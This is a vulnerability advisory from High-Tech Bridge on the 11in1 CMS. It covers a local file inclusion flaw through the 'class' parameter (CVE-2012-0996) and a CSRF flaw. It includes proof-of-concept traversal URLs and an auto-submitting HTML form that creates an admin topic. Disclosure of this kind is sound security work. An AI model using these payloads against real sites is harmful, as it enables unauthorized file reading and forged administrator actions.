High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in 11in1, which can be exploited to perform Local File Inclusion and Сross-Site Request Forgery (CSRF) attacks.
Local File Inclusion in 11in1: CVE-2012-0996
Input passed via the “class” GET parameter to index.php and /admin/index.php is not properly verified before being used to include local files.
This can be exploited to include local files via directory traversal sequences and URL-encoded NULL bytes.
The following PoC (Proof of Concept) demostrate the vulnerability:
http://[host]/index.php?class=…/…/…/tmp/file%00
http://[host]/admin/index.php?class=…/…/…/tmp/file%00
Successful exploitation of the vulnerabilities requires that “magic_quotes_gpc” is off.
Сross-Site Request Forgery (CSRF) in 11in1: CVE-2012-0997
The application allows authorized users to perform certain actions via HTTP requests without making proper validity checks to verify the source of the requests.
An attacker should make logged-in administrator open a malicious link in the browser to exploit this vulnerability.
The following PoC will create a new topic on behalf of website administrator:
<form action=“http://[host]/admin/index.php?class=do&action=addTopic” method=“post”>
<input type=“hidden” name=“name” value=“New Topic Name here”>
<input type=“hidden” name=“sec” value=“3”>
<input type=“hidden” name=“content” value=“New Topic Content here”>
<input type=“submit” id=“btn”>
</form>
<script>
document.getElementById(‘btn’).click();
</script>